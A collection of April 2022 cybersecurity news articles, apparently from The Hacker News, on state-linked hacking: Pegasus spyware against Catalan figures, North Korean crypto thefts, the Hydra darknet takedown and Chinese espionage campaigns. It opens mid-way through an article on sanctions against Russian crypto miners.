"By operating vast server farms that sell virtual currency mining capacity internationally, these companies help Russia monetize its natural resources," the Treasury said. "However, mining companies rely on imported computer equipment and fiat payments, which makes them vulnerable to sanctions."
Experts Uncover Spyware Attacks Against Catalan Politicians and Activists
21.4.22 BigBrothers Thehackernews
A previously unknown zero-click exploit in Apple's iMessage was used to install mercenary spyware from NSO Group and Candiru against at least 65 individuals as part of a "multi-year clandestine operation."
"Victims included Members of the European Parliament, Catalan Presidents, legislators, jurists, and members of civil society organizations," the University of Toronto's Citizen Lab said in a new report. "Family members were also infected in some cases."
Of the 65 individuals, 63 were targeted with Pegasus and four others were infected with Candiru, with iPhones belonging to at least two compromised with both. The incidents are said to have mostly occurred between 2017 and 2020.
The attacks involved the weaponization of an iOS exploit dubbed HOMAGE that made it possible to penetrate the devices running versions prior to iOS 13.2, which was released on October 28, 2019. It's worth noting that the latest version of iOS is iOS 15.4.1.
Although the intrusions have not been attributed to a specific government or entity, the Citizen Lab implied a connection to the Spanish authorities based on a "range of circumstantial evidence," citing ongoing tensions between the country and the autonomous community of Catalonia amid calls for Catalan's independence.
The findings build on a prior report from The Guardian and El Paνs in July 2020 that revealed a case of domestic political espionage aimed at Catalan pro-independence supporters using a vulnerability in WhatsApp to deliver the Pegasus surveillanceware.
Besides relying on the now-patched WhatsApp vulnerability (CVE-2019-3568), the attacks made use of multiple zero-click iMessage exploits and malicious SMS messages to hack Catalan targets' iPhones with Pegasus over a three year period.
"The HOMAGE exploit appears to have been in use during the last months of 2019, and involved an iMessage zero-click component that launched a WebKit instance in the com.apple.mediastream.mstreamd process, following a com.apple.private.alloy.photostream lookup for a Pegasus email address," the researchers said.
The issue is likely believed to have been closed by Apple in version iOS 13.2, as the exploit was observed as being fired only against devices running iOS versions 13.1.3 and lower. Also put to use is another exploit chain called KISMET that was present in iOS 13.5.1.
On the other hand, the four individuals who were compromised with Candiru's spyware were victims of an email-based social engineering attack designed to trick the victims into opening seemingly legitimate links about COVID-19 and messages impersonating the Mobile World Congress (MWC), an annual trade show that takes place in Barcelona.
Both Pegasus and Candiru's spyware (called DevilsTongue by Microsoft) are engineered to covertly gain extensive access to sensitive information stored in mobile and desktop devices.
"The spyware [...] is capable of reading texts, listening to calls, collecting passwords, tracking locations, accessing the target device's microphone and camera, and harvesting information from apps," the researchers said. "Encrypted calls and chats can also be monitored. The technology can even maintain access to victims' cloud accounts after the infection has ended."
The links to NSO Group's Pegasus and Candiru stem from infrastructure overlaps, with the hacking operations likely the work of a customer with ties to the Spanish government owing to the timing of the attacks and the victimology patterns, the Citizen Lab said.
"The case is notable because of the unrestrained nature of the hacking activities," the researchers concluded.
"If the Spanish government is responsible for this case, it raises urgent questions about whether there is proper oversight over the country's intelligence and security agencies, as well as whether there is a robust legal framework that authorities are required to follow in undertaking any hacking activities."
FBI, U.S. Treasury and CISA Warn of North Korean Hackers Targeting Blockchain Companies
21.4.22 BigBrothers Thehackernews
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the Federal Bureau of Investigation (FBI) and the Treasury Department, warned of a new set of ongoing cyber attacks carried out by the Lazarus Group targeting blockchain companies.
Calling the activity cluster TraderTraitor, the infiltrations involve the North Korean state-sponsored advanced persistent threat (APT) actor striking entities operating in the Web3.0 industry since at least 2020.
Targeted organizations include cryptocurrency exchanges, decentralized finance (DeFi) protocols, play-to-earn cryptocurrency video games, cryptocurrency trading companies, venture capital funds investing in cryptocurrency, and individual holders of large amounts of cryptocurrency or valuable non-fungible tokens (NFTs).
The attack chains commence with the threat actor reaching out to victims via different communication platforms to lure them into downloading weaponized cryptocurrency apps for Windows and macOS, subsequently leveraging the access to propagate the malware across the network and conduct follow-on activities to steal private keys and initiate rogue blockchain transactions.
"Intrusions begin with a large number of spear-phishing messages sent to employees of cryptocurrency companies," the advisory reads. "The messages often mimic a recruitment effort and offer high-paying jobs to entice the recipients to download malware-laced cryptocurrency applications."
This is far from the first time the group has deployed custom malware to steal cryptocurrency. Other campaigns mounted by the Lazarus Group consist of Operation AppleJeus, SnatchCrypto, and, more recently, making use of trojanized DeFi wallet apps to backdoor Windows machines.
The TraderTraitor threat comprises a number of fake crypto apps that are based on open-source projects and claim to be cryptocurrency trading or price prediction software, only to deliver the Manuscrypt remote access trojan, a piece of malware previously tied to the group's hacking campaigns against the cryptocurrency and mobile games industries.
The list of malicious apps is below -
DAFOM (dafom[.]dev)
TokenAIS (tokenais[.]com)
CryptAIS (cryptais[.]com)
AlticGO (alticgo[.]com)
Esilet (esilet[.]com), and
CreAI Deck (creaideck[.]com)
The disclosure comes less than a week after the Treasury Department attributed the cryptocurrency theft of Axie Infinity's Ronin Network to the Lazarus Group, sanctioning the wallet address used to receive the stolen funds.
"North Korean state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest, acquire sensitive cryptocurrency-intellectual property, and gain financial assets," the agencies said.
"These actors will likely continue exploiting vulnerabilities of cryptocurrency technology firms, gaming companies, and exchanges to generate and launder funds to support the North Korean regime."
Ethereum Developer Jailed 63 Months for Helping North Korea Evade Sanctions
15.4.22 BigBrothers Thehackernews
A U.S. court has sentenced former Ethereum developer Virgil Griffith to five years and three months in prison and pay a $100,000 fine for conspiring with North Korea to help use cryptocurrencies to circumvent sanctions imposed on the country.
"There is no question North Korea poses a national security threat to our nation, and the regime has shown time and again it will stop at nothing to ignore our laws for its own benefit," U.S. Attorney Damian Williams said in a statement.
The sentencing comes more than six months after Griffith pleaded guilty to violating the International Emergency Economic Powers Act (IEEPA) by offering technical advice to the hermit kingdom with regards to the use of digital currency to bypass economic restrictions. Griffith was arrested in November 2019.
North Korea is known to rely on cryptocurrency heists to get around international sanctions and use it to help fund programs to build weapons of mass destruction. Indeed, the nation-state-backed Lazarus Group siphoned an estimated $400 million worth of digital assets from crypto platforms in 2021 alone.
"The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country," Israeli cybersecurity company ClearSky noted in August 2020.
Griffith is said to have conceived plans back in 2018 to develop and fund cryptocurrency infrastructure in North Korea, such as crypto mining, and subsequently provided instructions on how the regime could use blockchain technologies like smart contracts to launder funds.
The 39-year-old defendant, a U.S. citizen and a resident of Singapore, also formulated proposals to facilitate the exchange of digital currency between North and South Korea, and attempted to recruit other U.S. citizens to offer similar services to individuals in the nation.
These actions were carried out despite having been refused permission from the Department of the Treasury's Office of Foreign Assets Control (OFAC), the Justice Department said in the ruling.
"Mr. Griffith admitted in court he took actions to evade sanctions, which are in place to prevent the DPRK from building a nuclear weapon," Williams added. "Justice has been served with the sentence handed down today."
E.U. Officials Reportedly Targeted with Israeli Pegasus Spyware
12.4.22 BigBrothers Thehackernews
Senior officials in the European Union were allegedly targeted with NSO Group's infamous Pegasus surveillance tool, according to a new report from Reuters.
At least five individuals, including European Justice Commissioner Didier Reynders, are said to have been singled out in total, the news agency said, citing documents and two unnamed E.U. officials. However, it's not clear who used the commercial spyware against them or what information was obtained following the attacks.
NSO Group said in a statement shared with Reuters that it was not responsible for the hacking attempts, adding that the targeting "could not have happened with NSO's tools."
The targeting is said to have come to light after Apple notified the victims of state-sponsored attacks last November as part of its efforts to stop the Israeli surveillance firm from targeting its customers.
That same month, the iPhone maker filed a lawsuit against NSO Group, seeking a court-issued injunction aimed at banning the company from using its products and services to develop and launch spyware attacks.
Apple called NSO Group as "notorious hackers amoral 21st century mercenaries who have created highly sophisticated cyber-surveillance machinery that invites routine and flagrant abuse."
Pegasus, typically deployed through sophisticated "zero-click" exploits like FORCEDENTRY, grants its government and law enforcement customers complete access to a target's device, including their personal data, photos, messages, and precise location.
The widespread abuse of Pegasus to systematically spy on civil society in recent years has led the U.S. government to add NSO Group to its trade blocklist, in turn prompting Israel to restrict the number of countries to which local security firms can sell offensive hacking and surveillance tools.
In February 2022, the European Data Protection Supervisor called for a ban on the development and the use of Pegasus-like commercial spyware in the region, pointing out the technology's "unprecedented level of intrusiveness" that could endanger users' right to privacy.
But despite attempts to regulate the use of spyware, a forensic investigation released by Front Line Defenders last week found that the iPhone belonging to Suhair Jaradat, a Jordanian journalist and human rights defender, was hacked with Pegasus via a malicious WhatsApp message in December 2021, weeks after Apple initiated legal proceedings.
"The fact that the targeting we uncovered happened after the widespread publicity around Apple's lawsuit and notifications to victims is especially remarkable," the report said.
"A firm that truly respected such concerns would have at least paused operations for government clients, like Jordan, that have a widely publicized track record of human rights concerns and had enacted emergency powers giving authorities widespread latitude to infringe on civil liberties."
Chinese Hacker Groups Continue to Target Indian Power Grid Assets
9.4.22 BigBrothers Thehackernews
China-linked adversaries have been attributed to an ongoing onslaught against Indian power grid organizations, one year after a concerted campaign targeting critical infrastructure in the country came to light.
Most of the intrusions involved a modular backdoor named ShadowPad, according to Recorded Future's Insikt Group, a sophisticated remote access trojan which has been dubbed a "masterpiece of privately sold malware in Chinese espionage."
"ShadowPad continues to be employed by an ever-increasing number of People's Liberation Army (PLA) and Ministry of State Security (MSS)-linked groups, with its origins linked to known MSS contractors first using the tool in their own operations and later likely acting as a digital quartermaster," the researchers said.
The goal of the sustained campaign, the cybersecurity company said, is to facilitate intelligence gathering pertaining to critical infrastructure systems in preparation for future contingency operations. The targeting is believed to have commenced in September 2021.
The attacks took aim at seven State Load Despatch Centres (SDLCs) located primarily in Northern India, in particular those close to the disputed India-China border in Ladakh, with one of the targets victimized in a similar attack disclosed in February 2021 and attributed to the RedEcho group.
The 2021 RedEcho attacks involved the compromise of 10 distinct Indian power sector organizations, including six of the country's regional and state load despatch centres (RLDC), two ports, a nation power plant, and a substation.
Recorded Future linked the latest set of malicious activities to an emerging threat cluster it's tracking under the moniker Threat Activity Group 38 aka TAG-38 (similar to the UNC#### and DEV-#### designations given by Mandiant and Microsoft), citing "notable distinctions" from that of the previously identified RedEcho TTPs.
In addition to attacking power grid assets, TAG-38 impacted a national emergency response system and the Indian subsidiary of a multinational logistics company.
Although the initial infection vector used to breach the networks is unknown, the ShadowPad malware on the host systems were commandeered by means of a network of infected internet-facing DVR/IP camera devices geolocated in Taiwan and South Korea.
"The use of ShadowPad across Chinese activity groups continues to grow over time, with new clusters of activity regularly identified using the backdoor as well as continued adoption by previously tracked clusters," the researchers said, adding it's monitoring at least 10 distinct groups with access to the malware.
Following the disclosure, India's Union Power Minister R. K. Singh characterized the intrusions as unsuccessful "probing attempts" at hacking which happened in January and February, and that the government is constantly reviewing its cybersecurity mechanisms to bolster defenses.
China, for its part, reiterated that it "firmly opposes and combats all forms of cyber attacks" and that "cybersecurity is a common challenge facing all countries that should be jointly addressed through dialogue and cooperation."
"Recently, Chinese cybersecurity companies released a series of reports, revealing that the U.S. government launched cyber attacks on many countries around the world, including China, seriously jeopardizing the security of critical infrastructure of these countries," China's Foreign Ministry spokesperson, Zhao Lijian, said.
"It is worth noting that many of U.S. allies or countries with which it cooperates on cyber security are also victims of U.S. cyber attacks. We believe that the international community, especially China's neighboring countries, will keep their eyes wide open and make their own judgment on the true intentions of the U.S. side."
Microsoft Obtains Court Order to Take Down Domains Used to Target Ukraine
9.4.22 BigBrothers Thehackernews
Microsoft on Thursday disclosed that it obtained a court order to take control of seven domains used by APT28, a state-sponsored group operated by Russia's military intelligence service, with the goal of neutralizing its attacks on Ukraine.
"We have since re-directed these domains to a sinkhole controlled by Microsoft, enabling us to mitigate Strontium's current use of these domains and enable victim notifications," Tom Burt, Microsoft's corporate vice president of customer security and trust, said.
APT28, also known by the names Sofacy, Sednit, Pawn Storm, Fancy Bear, Iron Twilight, and Strontium, is a cyber espionage group and an advanced persistent threat that's known to be active since 2009, striking media, governments, military, and international non-governmental organizations (NGOs) that often have a security focus.
The tech giant noted that the sinkholed infrastructure was used by the threat actor to target Ukrainian institutions as well as governments and think tanks in the U.S. and the European Union so as to maintain long term persistent access and exfiltrate sensitive information.
The seizure is part of a long-term investment to systematically dismantle used by the threat actor, Microsoft said, adding it has used the expedited legal framework put in place 15 times to take down more than 100 Strontium-controlled domains.
Meta takes action against Ghostwriter and Phosphorus
The disclosure from Microsoft comes as Meta, the company formerly known as Facebook, revealed that it took action against covert adversarial networks originating from Azerbaijan and Iran on its platform, by taking down the accounts and blocking their domains from being shared.
The Azerbaijanian operation is believed to have singled out democracy activists, opposition groups, and journalists from the country and government critics abroad for carrying out credential phishing and espionage activities.
Another involved UNC788 (aka Charming Kitten, TA453, or Phosphorus), a government-linked hacking crew that has a history of conducting surveillance operations in support of Iranian strategic priorities.
"This group used a combination of low-sophistication fake accounts and more elaborate fictitious personas, which they likely used to build trust with potential targets and trick them into clicking on phishing links or downloading malicious applications," Meta outlined in its first quarterly Adversarial Threat Report.
The malicious Android applications, dubbed HilalRAT, impersonated seemingly harmless Quran apps to extract sensitive information, such as contacts list, text messages, files, location information, as well as activate camera and microphone.
Meta also said it blocked the malicious activities associated with an unreported Iranian hacking group that leveraged tactics similar to that of Tortoiseshell to target or spoof companies in the energy, IT, maritime logistics, semiconductor, and telecom industries.
This campaign featured an elaborate set of bogus profiles on Instagram, LinkedIn, Facebook, and Twitter, with the actors posing as recruiters of real and front companies to trick users into clicking on phishing links to deliver information stealing malware that were disguised as VPN, calculator, audiobook, and messaging apps.
"They developed malware on the VMWare ThinApp virtualization platform, which allowed them to run it on many different systems and hold malicious payload back until the last minute, making malware detection more challenging," Meta explained.
Lastly, also disrupted by Meta were takeover attempts made by the Belarus-aligned Ghostwriter group to break into the Facebook accounts of dozens of Ukrainian military personnel.
The attacks, which were successful in a "handful of cases," abused the access to victims' social media accounts and posted disinformation "calling on the Army to surrender as if these posts were coming from the legitimate account owners."
Hamas-linked Hackers Targeting High-Ranking Israelis Using 'Catfish' Lures
9.4.22 BigBrothers Thehackernews
A threat actor with affiliations to the cyber warfare division of Hamas has been linked to an "elaborate campaign" targeting high-profile Israeli individuals employed in sensitive defense, law enforcement, and emergency services organizations.
"The campaign operators use sophisticated social engineering techniques, ultimately aimed to deliver previously undocumented backdoors for Windows and Android devices," cybersecurity company Cybereason said in a Wednesday report.
"The goal behind the attack was to extract sensitive information from the victims' devices for espionage purposes."
The monthslong intrusions, codenamed "Operation Bearded Barbie," have been attributed to an Arabic-speaking and politically-motivated group called Arid Viper, which operates out of the Middle East and is also known by the monikers APT-C-23 and Desert Falcon.
Most recently, the threat actor was held responsible for attacks aimed at Palestinian activists and entities starting around October 2021 using politically-themed phishing emails and decoy documents.
The latest infiltrations are notable for their specific focus on plundering information from computers and mobile devices belonging to Israeli individuals by luring them into downloading trojanized messaging apps, granting the actors unfettered access.
The social engineering attacks involved the use of fake personas on Facebook, relying on the tactic of catfishing to set up fictitious profiles of attractive young women to gain the trust of the targeted individuals and befriend them on the platform.
"After gaining the victim's trust, the operator of the fake account suggests migrating the conversation from Facebook over to WhatsApp," the researchers elaborated. "By doing so, the operator quickly obtains the target's mobile number."
Once the chat shifts from Facebook to WhatsApp, the attackers suggest the victims that they install a secure messaging app for Android (dubbed "VolatileVenom") as well as open a RAR archive file containing explicit sexual content that leads to the deployment of a malware downloader called Barb(ie).
Other hallmarks of the campaign have included the group leveraging an upgraded arsenal of malware tools, including the BarbWire Backdoor, which is installed by the downloader module.
The malware serves as a tool to completely compromise the victim machine, allowing it to establish persistence, harvest stored information, record audio, capture screenshots, and download additional payloads, all of which is transmitted back to a remote server.
VolatileVenom, on the other hand, is Android spyware that's known to spoof legitimate messaging apps and masquerade as system updates and which has been put to use in different campaigns by Arid Viper since at least 2017.
One such example of a rogue Android app is called "Wink Chat," where victims attempting to sign up to use the application are presented an error message that "it will be uninstalled," only for it to stealthily run in the background and extract a wide variety of data from the mobile devices.
"The attackers use a completely new infrastructure that is distinct from the known infrastructure used to target Palestinians and other Arabic-speakers," the researchers said.
"This campaign shows a considerable step-up in APT-C-23 capabilities, with upgraded stealth, more sophisticated malware, and perfection of their social engineering techniques which involve offensive HUMINT capabilities using a very active and well-groomed network of fake Facebook accounts that have been proven quite effective for the group."
FBI Shut Down Russia-linked "Cyclops Blink" Botnet That Infected Thousands of Devices
9.4.22 BigBrothers Thehackernews
The U.S. Department of Justice (DoJ) announced that it neutralized Cyclops Blink, a modular botnet controlled by a threat actor known as Sandworm, which has been attributed to the Main Intelligence Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).
"The operation copied and removed malware from vulnerable internet-connected firewall devices that Sandworm used for command-and-control (C2) of the underlying botnet," the DoJ said in a statement Wednesday.
In addition to disrupting its C2 infrastructure, the operation also closed the external management ports that the threat actor used to establish connections with the firewall appliances, effectively severing contact and preventing the hacking group from using the infected devices to commandeer the botnet.
The March 22 court-authorized disruption of Cyclops Blink comes a little over a month after intelligence agencies in the U.K. and the U.S. described the botnet as a replacement framework for the VPNFilter malware that was exposed and sinkholed in May 2018.
Cyclops Blink, which is believed to have emerged as early as June 2019, primarily targeted WatchGuard firewall appliances and ASUS routers, with the Sandworm group leveraging a previously identified security vulnerability in WatchGuard's Firebox firmware as an initial access vector.
A follow-up analysis by cybersecurity firm Trend Micro last month suggested the possibility that the botnet is an attempt to "build an infrastructure for further attacks on high-value targets."
"These network devices are often located on the perimeter of a victim's computer network, thereby providing Sandworm with the potential ability to conduct malicious activities against all computers within those networks," the DoJ added.
Details of the security flaw were never made public beyond the fact that the company addressed the issue as part of software updates issued in May 2021, with WatchGuard noting to the contrary that the vulnerabilities were internally detected and that they were not "actively found in the wild."
The company has since revised its Cyclops Blink FAQs to spell out that the vulnerability in question is CVE-2022-23176 (CVSS score: 8.8), which could "allow an unprivileged user with access to Firebox management to authenticate to the system as an administrator" and gain unauthorized remote access.
ASUS, for its part, has released firmware patches as of April 1, 2022, to block the threat, recommending users to update to the latest version.
Ukraine Warns of Cyber attack Aiming to Hack Users' Telegram Messenger Accounts
6.4.22 BigBrothers Thehackernews
Ukraine's technical security and intelligence service is warning of a new wave of cyber attacks that are aimed at gaining access to users' Telegram accounts.
"The criminals sent messages with malicious links to the Telegram website in order to gain unauthorized access to the records, including the possibility to transfer a one-time code from SMS," the State Service of Special Communication and Information Protection (SSSCIP) of Ukraine said in an alert.
The attacks, which have been attributed to a threat cluster called "UAC-0094," originate with Telegram messages alerting recipients that a login had been detected from a new device located in Russia and urging the users to confirm their accounts by clicking on a link.
The URL, in reality a phishing domain, prompts the victims to enter their phone numbers as well as the one-time passwords sent via SMS that are then used by the threat actors to take over the accounts.
The modus operandi mirrors that of an earlier phishing attack that was disclosed in early March that leveraged compromised inboxes belonging to different Indian entities to send phishing emails to users of Ukr.net to hijack the accounts.
In another social engineering campaign observed by Ukraine's Computer Emergency Response Team (CERT-UA), war-related email lures were sent to Ukrainian government agencies to deploy a piece of espionage malware.
The emails come with an HTML file attachment ("War Criminals of the Russian Federation.htm"), opening which culminates in the download and execution of a PowerShell-based implant on the infected host.
CERT-UA attributed the attack to Armageddon, a Russia-based threat actor with ties to the Federal Security Service (FSB) that has a history of striking Ukrainian entities since at least 2013.
In February 2022, the hacking group was connected to espionage attacks targeting government, military, non-government organizations (NGO), judiciary, law enforcement, and non-profit organizations with the main goal of exfiltrating sensitive information.
Armageddon, also known by the moniker Gamaredon, is also believed to have singled out Latvian government officials as part of a related phishing attack towards the end of March 2022, employing war-themed RAR archives to deliver malware.
Other phishing campaigns documented by CERT-UA in recent weeks have deployed a variety of malware, including GraphSteel, GrimPlant, HeaderTip, LoadEdge, and SPECTR, not to mention a Ghostwriter-spearheaded operation to install the Cobalt Strike post-exploitation framework.
The GrimPlant and GraphSteel attacks, associated with a threat actor called UAC-0056 (aka SaintBear, UNC2589, TA471), are believed to have commenced in early February 2022, according to SentinelOne, which described the payloads as pernicious binaries designed to conduct reconnaissance, credential harvesting, and run arbitrary commands.
SaintBear is also assessed to have been behind the WhisperGate activity in early January 2022 impacting government agencies in Ukraine, with the actor preparing the infrastructure for GrimPlant and GraphSteel campaign beginning in December 2021.
Last week, Malwarebytes Labs implicated the hacking crew in a new set of late March attacks directed against Ukrainian organizations, counting a private TV channel named ICTV, by means of a spear-phishing lure that contained macro-embedded Excel documents, leading to the distribution of the GrimPlant backdoor (aka Elephant Implant).
The disclosure comes as several advanced persistent threat (APT) groups from Iran, China, North Korea, and Russia have capitalized on the ongoing Russo-Ukrainian war as a pretext to backdoor victim networks and stage other malicious activities.
U.S. Treasury Department Sanctions Russia-based Hydra Darknet Marketplace
6.4.22 BigBrothers Thehackernews
The U.S. Treasury Department on Tuesday sanctioned Hydra, the same day German law enforcement authorities disrupted the world's largest and longest-running dark web marketplace following a coordinated operation in partnership with U.S. officials.
The sanctions are part of an "international effort to disrupt proliferation of malicious cybercrime services, dangerous drugs, and other illegal offerings available through the Russia-based site," the Treasury Department said in a statement.
Along with the sanctions, the Office of Foreign Assets Control (OFAC) disclosed a list of more than 100 virtual currency addresses that have been identified as associated with the entity's operations to conduct illicit transactions.
The sanctions come as Germany's Federal Criminal Police Office shut down the online criminal marketplace that it said specialized in narcotics trade, seizing its servers and 543 bitcoins worth 23 million euros ($25.3 million).
Hydra was a Russian-language darknet platform that had been accessible via the Tor network since at least November 2015, facilitating the trafficking of outlawed goods and services, including illegal drugs, stolen financial information, fraudulent identification documents, and money laundering and mixing services.
The Treasury Department, in a related move, also sanctioned the virtual currency exchange Garantex, making it the third crypto platform to be blocklisted by the U.S. after SUEX and CHATEX.
"Analysis of known Garantex transactions shows that over $100 million in transactions are associated with illicit actors and darknet markets, including nearly $6 million from Russian RaaS gang Conti and also including approximately $2.6 million from Hydra," the Treasury Department noted.
In a simultaneous move, the Department of Justice (DoJ) announced charges against Dmitry Olegovich Pavlov, a 30-year-old Russian national, in connection with operating the servers used to run Hydra, in addition to accusing him for furthering the distribution of narcotics and engaging in money laundering.
Pavlov is alleged to have operated a company named Promservice Ltd., also known as Hosting Company Full Drive, All Wheel Drive, and 4x4host.ru, to commandeer the servers. He also purportedly conspired with other operators of the marketplace by providing the infrastructure backbone that enabled its success in a "competitive darknet market environment."
"In 2021, Hydra accounted for an estimated 80% of all darknet market-related cryptocurrency transactions, and since 2015, the marketplace has received approximately $5.2 billion in cryptocurrency," the DoJ said.
Besides allowing vendors to openly advertise a variety of deadly drugs for sale through a five-star rating system, Hydra is also said to have functioned as a distribution channel for forged passports and drivers' licenses as well as hacking tools and services that allowed bad actors to gain illegal access to online accounts.
These transactions on Hydra were conducted in virtual currency and its administrators charged a commission for every transaction conducted on the website. Hydra also provided users with cash-out and mixing services to convert their bitcoins into different forms of digital crypto assets and conceal their tracks.
"The dismantling of the Hydra Market, the dark web's largest supplier of illicit goods and services, sends a message to these electronic criminal kingpins that think they can operate with impunity," said Special Agent in Charge Anthony Salisbury of Homeland Security Investigations (HSI) Miami.
"HSI will continue to work with our U.S. and international law enforcement partners to target these transnational criminal organizations who attempt to manipulate the anonymity of the dark web to push their poison all over the world," Salisbury added.
The takedown has predictably "prompted heated discussions" on the dark web, as threat actors relying on the services offered by Hydra speculate about the future of the marketplace and point out the possibility that authorities or other malicious parties could "set up fake versions of Hydra in order to track down former users."
However, the administrators of Hydra have not acknowledged the closure and are attempting to paint a different picture, cybersecurity company Flashpoint said, with the operators reportedly claiming that "the market is undergoing 'technical works.'"
Germany Shuts Down Russian Hydra Darknet Market; Seizes $25 Million in Bitcoin
5.4.22 BigBrothers Thehackernews
Germany's Federal Criminal Police Office, the Bundeskriminalamt (BKA), on Tuesday announced the official takedown of Hydra, the world's largest illegal dark web marketplace that has cumulatively facilitated over $5 billion in Bitcoin transactions to date.
"Bitcoins amounting to currently the equivalent of approximately 23 million were seized, which are attributed to the marketplace," the BKA said in a press release. Blockchain analytics firm Elliptic confirmed that the seizure occurred on April 5, 2022 in a series of 88 transactions amounting to 543.3 BTC.
The agency attributed the shutdown of Hydra to an extensive investigation operation conducted by its Central Office for Combating Cybercrime (ZIT) in partnership with U.S. law enforcement authorities since August 2021.
Launched in 2015, Hydra was a Russian-language darknet marketplace that opened as a competitor to the now-defunct Russian Anonymous Marketplace (aka RAMP), primarily known for its high-traffic narcotics market before expanding their focus to peddle forged documents and stolen credit cards.
"Cybercriminals now use it to conduct illicit sales of stolen credit cards, SIM cards, and counterfeit documents and IDs, among other offerings as well as to obfuscate their own digital transactions through regional exchanges and extended money laundering tactics," Flashpoint noted in a May 2021 report.
Hydra's annual transaction volumes are estimated to have crossed $1.6 billion by the end of 2021, marking a staggering rise from a mere $6.6 million in 2016.
The dark web shop, which is believed to have had a turnover of $424.2 million for the first three months of 2022, also featured a Bitcoin Bank Mixer, which obfuscated all digital transactions made on the platform, thereby making it difficult for law enforcement agencies to track the cryptocurrency trails.
Visitors to the marketplace website are now greeted by a seizure banner that says: "The platform and the criminal content have been seized by the Federal Criminal Police Office (BKA) on behalf of the Attorney General's Office in Frankfurt am Main in the course of an international coordinated law enforcement operation."
The demise of Hydra follows a wave of recent law enforcement actions against criminal marketplaces since the start of the year, including that of UniCC, Canadian HeadQuarters, and four Russian carding shops Ferum Shop, Sky-Fraud, Trump's Dumps, and UAS that specialized in the sales of stolen credit cards.
Researchers Trace Widespread Espionage Attacks Back to Chinese 'Cicada' Hackers
5.4.22 BigBrothers Thehackernews
A Chinese state-backed advanced persistent threat (APT) group known for singling out Japanese entities has been attributed to a new long-running espionage campaign targeting new geographies, suggesting a "widening" of the threat actor's targeting.
The widespread intrusions, which are believed to have commenced at the earliest in mid-2021 and continued as recently as February 2022, have been tied to a group tracked as Cicada, which is also known as APT10, Stone Panda, Potassium, Bronze Riverside, or MenuPass Team.
"Victims in this Cicada (aka APT10) campaign include government, legal, religious, and non-governmental organizations (NGOs) in multiple countries around the world, including in Europe, Asia, and North America," researchers from the Symantec Threat Hunter Team, part of Broadcom Software, said in a report shared with The Hacker News.
"There is a strong focus on victims in the government and NGO sectors, with some of these organizations working in the areas of religion and education," Brigid O. Gorman, senior information developer at the Symantec Threat Hunter Team, told The Hacker News.
Most of the targeted organizations are located in the U.S., Canada, Hong Kong, Turkey, Israel, India, Montenegro, and Italy, alongside one victim in Japan, with the adversary spending as long as nine months on the networks of some of these victims.
"There are also some victims in the telecoms, legal and pharmaceutical sectors, but governmental and non-profit organizations appeared to have been the main focus in this campaign," Gorman added.
In March 2021, Kaspersky researchers took the wraps off an intelligence-gathering operation undertaken by the group to deploy information-gathering implants from a number of industry sectors located in Japan.
Then earlier this February, Stone Panda was implicated in an organized supply chain attack aimed at Taiwan's financial sector with the goal of stealing sensitive information from compromised systems.
The new set of attacks observed by Symantec commences with the actors gaining initial access by means of a known, unpatched vulnerability in Microsoft Exchange Servers, using it to deploy their backdoor of choice, SodaMaster.
"However, we did not observe the attackers exploiting a specific vulnerability, so we cannot say if they leveraged ProxyShell or ProxyLogon [flaws]," Gorman said.
SodaMaster is a Windows-based remote access trojan that's equipped with features to facilitate the retrieval of additional payloads and exfiltrate the information back to its command-and-control (C2) server.
Other tools deployed during the infiltrations include the Mimikatz credential dumping utility, NBTScan to conduct internal reconnaissance, WMIExec for remote command execution, and VLC Media Player to launch a custom loader on the infected host.
"This campaign with victims in such a large number of sectors appears to show the group is now interested in a wider variety of targets," Gorman said.
"The sorts of organizations targeted nonprofits and government organizations, including those involved in religious and education activity are most likely to be of interest to the group for espionage purposes. The sort of activity we see on victim machines and past Cicada activity also all point to the motivation behind this campaign being espionage."
Chinese Hackers Target VMware Horizon Servers with Log4Shell to Deploy Rootkit
2.4.22 BigBrothers Thehackernews
A Chinese advanced persistent threat tracked as Deep Panda has been observed exploiting the Log4Shell vulnerability in VMware Horizon servers to deploy a backdoor and a novel rootkit on infected machines with the goal of stealing sensitive data.
"The nature of targeting was opportunistic insofar that multiple infections in several countries and various sectors occurred on the same dates," said Rotem Sde-Or and Eliran Voronovitch, researchers with Fortinet's FortiGuard Labs, in a report released this week. "The victims belong to the financial, academic, cosmetics, and travel industries."
Deep Panda, also known by the monikers Shell Crew, KungFu Kittens, and Bronze Firestone, is said to have been active since at least 2010, with recent attacks "targeting legal firms for data exfiltration and technology providers for command-and-control infrastructure building," according to Secureworks.
Cybersecurity firm CrowdStrike, which assigned the panda-themed name to the threat cluster all the way back in July 2014, called it "one of the most advanced Chinese nation-state cyber intrusion groups."
The latest set of attacks documented by Fortinet shows that the infection procedure involved the exploitation of the Log4j remote code execution flaw (aka Log4Shell) in vulnerable VMware Horizon servers to spawn a chain of intermediate stages, ultimately leading to the deployment of a backdoor dubbed Milestone ("1.dll").
Based on the leaked source code of the infamous Gh0st RAT but with notable differences in the command-and-control (C2) communication mechanism employed, Milestone is also designed to send information about the current sessions on the system to the remote server.
Also detected during the attacks is a kernel rootkit called "Fire Chili" that's digitally signed with stolen certificates from game development companies, enabling it to evade detection by security software and conceal malicious file operations, processes, registry key additions, and network connections.
This is achieved by means of ioctl (input/output control) system calls to hide the driver rootkit's registry key, the Milestone backdoor files, and the loader file and process used to launch the implant.
Fortinet's attribution to Deep Panda stems from overlaps between Milestone and Infoadmin RAT, a remote access trojan used by the sophisticated hacking collective in the early 2010s, with additional clues pointing to tactical similarities to that of the Winnti group.
This is backed by the use of compromised digital signatures belonging to gaming companies, a target of choice for Winnti, as well as a C2 domain (gnisoft[.]com), which has been previously linked to the Chinese state-sponsored actor as of May 2020.
"The reason these tools are linked to two different groups is unclear at this time," the researchers said. "It's possible that the groups' developers shared resources, such as stolen certificates and C2 infrastructure, with each other. This may explain why the samples were only signed several hours after being compiled."
The disclosure adds to a long list of hacking groups that have weaponized the Log4Shell vulnerability to strike VMware's virtualization platform.
In December 2021, CrowdStrike described an unsuccessful campaign undertaken by an adversary dubbed Aquatic Panda that leveraged the flaw to perform various post-exploitation operations, including reconnaissance and credential harvesting on targeted systems.
Since then, multiple groups have joined the fray, including the Iranian TunnelVision group, which was observed actively exploiting the Log4j logging library defect to compromise unpatched VMware Horizon servers with ransomware.
